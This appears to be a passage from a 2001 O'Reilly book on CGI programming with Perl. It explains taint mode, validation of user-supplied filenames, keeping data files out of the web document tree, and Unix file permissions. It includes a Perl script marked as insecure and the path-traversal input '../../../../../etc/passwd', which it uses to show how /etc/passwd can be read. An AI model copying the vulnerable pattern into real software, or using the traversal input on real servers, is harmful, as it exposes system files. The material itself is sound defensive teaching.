When you first start working with taint mode, it can be annoying because it seems to complain about everything. Of course, once you have gained a little experience, you learn what to watch out for and begin to write safe code without having to think about it.

Here are some basic tips to help you with the major problems you will first encounter:

It's common to add something like these two lines to CGI scripts running in taint mode (the PATH you choose may vary depending on your needs and your system):

$ENV{PATH} = "/bin:/usr/bin";
delete @ENV{ 'IFS', 'CDPATH', 'ENV', 'BASH_ENV' };

Data Storage

There are a number of security issues specifically related to reading and writing data. We'll discuss data storage in much greater detail in Chapter 10, Data Persistence. Let's review the security issues now.

Dynamic Filenames

You should be extra careful when opening files where the filename is dynamically generated based upon user input. For example, you may have data arranged according to date, with a separate directory for each year and a separate file for each month. If you have a CGI script that allows the user to search for records in this file according to month and year, you would not want to use this code:

#!/usr/bin/perl -wT
 
use strict;
use CGI;
use CGIBook::Error;
 
my $q = new CGI;
my @missing;
 
my $month = $q->param( "month" ) or push @missing, "month";
my $year  = $q->param( "year"  ) or push @missing, "year";
my $key   = quotemeta( $q->param( "key" ) ) or push @missing, "key";
 
if ( @missing ) {
    my $fields = join ", ", @missing;
    error( $q, "You left the following required fields blank: $fields."  );
}
 
local *FILE;
 
## This is INSECURE unless you first check the validity of $year and $month
open FILE, "/usr/local/apache/data/$year/$month" or
    error( $q, "Invalid month or year" );
 
print $q->header( "text/html" ),
      $q->start_html( "Results" ),
      $q->h1( "Results" ),
      $q->start_pre;
 
while (<FILE>) {
    print if /$key/;
}
 
print $q->end_pre,
      $q->end_html;

Any user who supplied "../../../../../etc/passwd" as a month could browse /etc/passwd, which is probably not a feature you want to provide. Assuming that your web form passes two-digit numbers for months and years, you should add the following lines:

unless ( $year =~ /^\d\d$/ and $month =~ /^\d\d$/ ) {
    error( $q, "Invalid month or year" );
}

You may have noticed that taint mode is enabled and wondered why it did not catch this security problem. Remember, the function of taint mode is to prevent you from accidentally using data that comes from outside your program to change resources outside your program. This code does not attempt to change any outside resources, so taint mode sees no reason to stop the script from reading /etc/passwd. Taint mode will only stop you from opening a file with a user-supplied filename if you are opening the file to write to it.
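Because taint mode will not help here, it is worth keeping the validity check and the construction of the path together. One possible way to do that, sketched below, is a helper that validates and untaints in one step, so the result remains usable if the script later needs to write to the file. The name data_file_for and the $DATA_ROOT variable are ours:

```perl
use strict;
use warnings;

my $DATA_ROOT = "/usr/local/apache/data";

# Hypothetical helper: returns the data file path for a two-digit year and
# month, or undef if either value is not exactly two digits.
sub data_file_for {
    my ( $year, $month ) = @_;
    return undef unless defined $year and defined $month;

    # Capturing with parentheses validates and untaints in one step.
    my ( $safe_year )  = $year  =~ /^(\d\d)$/ or return undef;
    my ( $safe_month ) = $month =~ /^(\d\d)$/ or return undef;

    return "$DATA_ROOT/$safe_year/$safe_month";
}

for my $month ( "07", "../../../../../etc/passwd" ) {
    my $path = data_file_for( "99", $month );
    print defined $path ? "open $path\n" : "Invalid month or year\n";
}
```

A script would call the helper once and report an error whenever it returns undef, instead of interpolating $year and $month into the path directly.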

In this example, we were reading from a text file, but this security issue applies to other forms of data storage too. We could have just as easily been reading from a DBM file instead. Likewise, when you use an RDBMS, you must specify what database you wish to connect to, and it is very poor design to allow the user to specify what database to open and read.
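If a script really must let the user choose among several data sources, one common approach is to accept only a key and look the real name up in a table that the script itself defines. The sketch below assumes two made-up sources; the keys and the data source strings are placeholders, not real databases:

```perl
use strict;
use warnings;

# Hypothetical table of the data sources this script is willing to open.
# The user supplies only the key; the value never comes from user input.
my %DATA_SOURCE = (
    catalog => "dbi:mysql:catalog",
    news    => "dbi:mysql:news",
);

# Returns the data source for a recognized key, or undef otherwise.
sub data_source_for {
    my ( $choice ) = @_;
    return undef unless defined $choice and exists $DATA_SOURCE{$choice};
    return $DATA_SOURCE{$choice};
}

for my $choice ( "news", "mysql", "../../etc/passwd" ) {
    my $source = data_source_for( $choice );
    print "$choice: ", ( defined $source ? $source : "not allowed" ), "\n";
}
```

Because the returned string is a literal from the script itself, it is never tainted, and a user cannot reach any database that is not in the table.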

Location of Files

Your data files should not be directly browsable by the user, so they should not be in the web server's document tree. This is a mistake people frequently make when installing third-party web applications. Many freely available web applications are distributed with all of their files--including configuration files that contain important data like administrative passwords--in one directory to make them easy to install. If you install the application as it comes packaged, then anyone who is familiar with the application can access the configuration information and possibly exploit it. Often these applications allow you to change filenames relatively easily, so some developers try to hide important data files by renaming them from their default name to a more obscure name. A much better solution is to move them out of the web document tree altogether.

Unless you store all of your data in an RDBMS, you should have a standard data tree just like your web document tree where you can store all your application data. Give each web application a subdirectory under the root data directory. Do not configure the web server to serve files out of this directory. In our examples, we use /usr/local/apache/data as the root of our data tree.
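A quick way to check an installation is to compare a data file's path against the document root. The following sketch compares path components only; it does not resolve symbolic links or ".." segments. The document root /usr/local/apache/htdocs and the application paths are assumptions for illustration:

```perl
use strict;
use warnings;
use File::Spec;

# Returns 1 if $path lies at or below $dir, comparing path components.
# This is a textual check: symbolic links and ".." are not resolved.
sub is_inside {
    my ( $path, $dir ) = @_;
    my @path = File::Spec->splitdir( File::Spec->canonpath( $path ) );
    my @dir  = File::Spec->splitdir( File::Spec->canonpath( $dir ) );

    return 0 if @path < @dir;
    for my $i ( 0 .. $#dir ) {
        return 0 if $path[$i] ne $dir[$i];
    }
    return 1;
}

my $doc_root = "/usr/local/apache/htdocs";   # assumed document root

for my $file ( "/usr/local/apache/htdocs/guestbook/config.txt",
               "/usr/local/apache/data/guestbook/config.txt" ) {
    print "$file: ", ( is_inside( $file, $doc_root )
        ? "browsable, move it" : "outside the document tree" ), "\n";
}
```

Comparing whole components rather than string prefixes avoids treating a sibling directory such as /usr/local/apache/htdocs-old as part of the document tree.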

File Permissions

You should use your web server's filesystem to help you control read and write access to data files. On Unix systems, each directory and file has an owner, a group, and a set of permissions. The web server also runs as a particular user and group, such as nobody.

The web server should not have write access to any file it doesn't need to write to. This simple guideline may sound obvious, but it is often ignored in practice.

Data files that your scripts only need to read should be owned by a user other than nobody, and they should have a restrictive file permission like 0644, which lets the web server read them but not modify them. If the web server needs to be able to write to a file and it is not the creator of the file, you may want to set the group of the file to nobody and enable the group write bit by setting its permission to 0664.

If the web server needs to be able to create files or subdirectories within a directory, then that directory must be writable. Assign its group to nobody and change the permissions to 0775; otherwise, directories should be 0755. Realize that if you make a directory writable, then existing files can be deleted or replaced even if these files themselves are read-only.
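These modes can be set and checked from Perl as well as from the shell. The sketch below works in a temporary directory so that it is safe to run anywhere on a Unix system; the filename records.txt and the helper permissions_of are ours. It does not change the owner or group, since that normally requires root privileges:

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Returns the permission bits of a path (e.g. 0644), or undef if stat fails.
sub permissions_of {
    my ( $path ) = @_;
    my @info = stat $path;
    return undef unless @info;
    return $info[2] & 07777;
}

my $dir  = tempdir( CLEANUP => 1 );   # stand-in for an application data directory
my $file = "$dir/records.txt";        # hypothetical data file

open my $fh, ">", $file or die "Cannot create $file: $!";
close $fh;

chmod 0644, $file or die "chmod failed: $!";   # only the owner may write
printf "read-only file:      %04o\n", permissions_of( $file );

chmod 0664, $file or die "chmod failed: $!";   # the group may write too
printf "group-writable file: %04o\n", permissions_of( $file );

chmod 0775, $dir or die "chmod failed: $!";    # the group may add and remove entries
printf "writable directory:  %04o\n", permissions_of( $dir );
```

Note the leading zero on each mode: chmod expects an octal number, and writing 644 instead of 0644 sets an entirely different set of bits.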

Summary

If you remember one thing from this chapter, it should be that you should never trust the user or the browser. Always double-check your input, avoid the shell, and use taint mode. Also, your system should be designed so that if crackers do break into your web server, they do not gain much. Web servers are frequent targets because they are the most visible system a company has, as well as the easiest to break into (though following the suggestions in this chapter certainly helps). Therefore, do not store important data (e.g., unencrypted credit card numbers) on the machine. Likewise, avoid creating trust relationships between the web server and other machines. Your network should be configured so that someone who manages to crack into your web server does not have easy access to the rest of your network.


1. A cracker is someone who attempts to break into computers, snoop network transmissions, and get into other forms of online mischief. This is quite different from a hacker, a clever programmer who can find creative, simple solutions to problems. Many programmers (most of whom consider themselves hackers) draw a sharp distinction between the two terms, even though the mainstream media often does not.

2. This example shows you why it is important to create a special user like nobody to run your web server and why this user should own as few files as possible. See "Getting Started" in Chapter 1.

3. As this book was going to press, the most recent versions of ActiveState Perl supported fork on Win32.

4. You may also see references to the MD5.pm module; MD5.pm is deprecated and is now only a wrapper to the Digest::MD5 module.

5. The perlsec manpage suggests a subroutine that uses Perl's kill function to test for taintedness. Unfortunately, the kill function is not supported by many systems. The subroutine provided here should work on any platform.


© 2001, O'Reilly & Associates, Inc.